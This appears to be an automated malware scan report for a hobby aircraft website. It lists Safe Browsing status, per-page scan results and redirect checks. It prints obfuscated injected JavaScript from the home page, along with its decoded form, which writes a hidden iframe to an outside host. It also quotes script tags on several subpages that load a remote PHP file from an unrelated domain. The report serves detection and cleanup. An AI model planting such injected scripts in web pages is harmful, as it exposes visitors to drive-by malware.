Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dogdevilpilots.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://dogdevilpilots.com/ | 200 OK Content-Length: 32393 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) c1z99f='';r5eb5d6c='rd7d0b821d77';r3162d0d579='r6b7f259';ra2484e22b=document;if(r5eb5d6c+c1z99f+r3162d0d579=='rd7d0b821d77r6b7f259'){ rd5bc96=ra2484e22b};rd5bc96.write('<scr'+'ipt>function r29a31c1(r203fa){return ev'+c1z99f+'al(r203fa); }</scr'+'ipt>'); function c127c4b23re21bf2d(rfa3d4aaf){ var re8f760f2=16; var z8d='';return (r29a31c1('pars'+z8d+'eInt')(rfa3d4aaf,re8f760f2));}function r6c32f9bc5(re68605bf){ var r7e2084dbe8e='';r8ef1b4c6='fromCh';r6ab2722fbfa=String[r8ef1b4c6+'arC Decoded script: function check_content(){var i=0;while(document.getElementsByTagName('iframe').length){var el=document.getElementsByTagName('iframe')[i];if( (el.style.display=='none' || el.style.visibility =='hidden' || (el.width<5 && el.height<5)) && el.name!='c4'){el.parentNode.removeChild(el);}else i++;}}check_content(); if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%34%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6f%64%65%67%64%61%2e%63%76%2e%75%61%2f%69%6e%2e%63%67%69%3f%32&%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%36%30%36%29%2b%27%30%38%35%27%20%77%69%64%74%68%3d%36%20%68%65%69%67%68%74%3d%31%30%31%20%73%74%79%6c%65%3d%27%76%69%73%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true; Antivirus reports:
| ||
http://dogdevilpilots.com/dogdevil.htm | 404 Not Found Content-Length: 532 Content-Type: text/html | clean |
http://dogdevilpilots.com/test404page.js | 404 Not Found Content-Length: 534 Content-Type: text/html | clean |
http://dogdevilpilots.com/index2.htm | 404 Not Found Content-Length: 530 Content-Type: text/html | clean |
http://dogdevilpilots.com/pages/dogdevil.htm | 200 OK Content-Length: 18606 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://www.belastingdienstaangifte.nl/nlvbjd6h.php?id=51736170"></script> | ||
http://dogdevilpilots.com/pages/../index2.htm | 404 Not Found Content-Length: 530 Content-Type: text/html | clean |
http://dogdevilpilots.com/pages/gallery.htm | 200 OK Content-Length: 17882 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://www.belastingdienstaangifte.nl/nlvbjd6h.php?id=51736178"></script> | ||
http://dogdevilpilots.com/pages/videos.htm | 200 OK Content-Length: 15731 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://www.belastingdienstaangifte.nl/nlvbjd6h.php?id=51736186"></script> | ||
http://dogdevilpilots.com/pages/purchase.htm | 200 OK Content-Length: 18610 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://www.belastingdienstaangifte.nl/nlvbjd6h.php?id=51736183"></script> | ||
http://dogdevilpilots.com/pages/contactus.htm | 200 OK Content-Length: 16071 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://www.belastingdienstaangifte.nl/nlvbjd6h.php?id=51736169"></script> | ||
http://dogdevilpilots.com/pages/../purchase.htm | 404 Not Found Content-Length: 532 Content-Type: text/html | clean |
http://dogdevilpilots.com/pages/orderform.htm | 200 OK Content-Length: 15594 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://www.belastingdienstaangifte.nl/nlvbjd6h.php?id=51736182"></script> | ||
http://dogdevilpilots.com/pages/telemaster.htm | 200 OK Content-Length: 17044 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://www.belastingdienstaangifte.nl/nlvbjd6h.php?id=51736185"></script> | ||
http://dogdevilpilots.com/pages/../images/telemasterlrg00.jpg | 200 OK Content-Length: 250649 Content-Type: image/jpeg | clean |
http://dogdevilpilots.com/pages/../images/telemasterlrg01.jpg | 200 OK Content-Length: 240214 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dogdevilpilots.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 13 Dec 2014 00:53:23 GMT
Accept-Ranges: bytes
ETag: "a0217-7e89-9a8fe9c0"
Server: Apache/2.0.64 (Unix) mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.6
Content-Length: 32393
Content-Type: text/html
Last-Modified: Sat, 01 Nov 2014 05:44:15 GMT
...32393 bytes of data.
GET / HTTP/1.1
Host: dogdevilpilots.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 13 Dec 2014 00:53:23 GMT
Accept-Ranges: bytes
ETag: "a0217-7e89-9a8fe9c0"
Server: Apache/2.0.64 (Unix) mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.6
Content-Length: 32393
Content-Type: text/html
Last-Modified: Sat, 01 Nov 2014 05:44:15 GMT
...32393 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: dogdevilpilots.com
Referer: http://www.google.com/search?q=dogdevilpilots.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: dogdevilpilots.com
Referer: http://www.google.com/search?q=dogdevilpilots.com
Result:
The result is similar to the first query. There are no suspicious redirects found.